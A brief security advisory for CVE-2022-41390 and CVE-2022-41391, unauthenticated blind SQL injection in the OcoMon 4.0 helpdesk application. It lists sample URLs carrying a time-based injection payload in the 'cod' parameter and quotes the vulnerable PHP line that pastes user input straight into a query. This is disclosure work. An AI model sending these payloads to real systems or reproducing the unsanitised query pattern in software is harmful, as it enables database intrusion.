Security
Headlines

Headline

CVE-2022-41391: OcoMon 4.0 - Blind SQL Injection

OcoMon v4.0 was discovered to contain a SQL injection vulnerability via the cod parameter at showImg.php.

Descriptions

During the internal research I found two Unauthenticated Blind SQL Injection on OcoMon HelpDesk application.

Mitre Reference

CVE-2022-41390 and CVE-2022-41391.

Vulnerability

The vulnerability was exploited using the burpsuite and sqlmap tool:

* Sample url: http://target:8000/ocomon-4.0RC1/includes/functions/download.php?file=3134&cod=(select*from(select(sleep(40))a)

* Sample url: http://target:8000/ocomon-4.0RC1/includes/functions/showImg.php?file=3134&cod=(select*from(select(sleep(40))a)

* Vulnerable parameters: cod

* Type: blind sql injection

Short code description

The vulnerabily happens because the code dont have sanatization in ‘cod’ paramenter then is possible to do the injection malicious code.

Example code:

if (isset($_GET[‘cod’])) {

$query .= "WHERE dom_cod = “.$_GET[‘cod’].”

Vendor notification

https://ocomonphp.sourceforge.io/downloads/

CVE: Latest News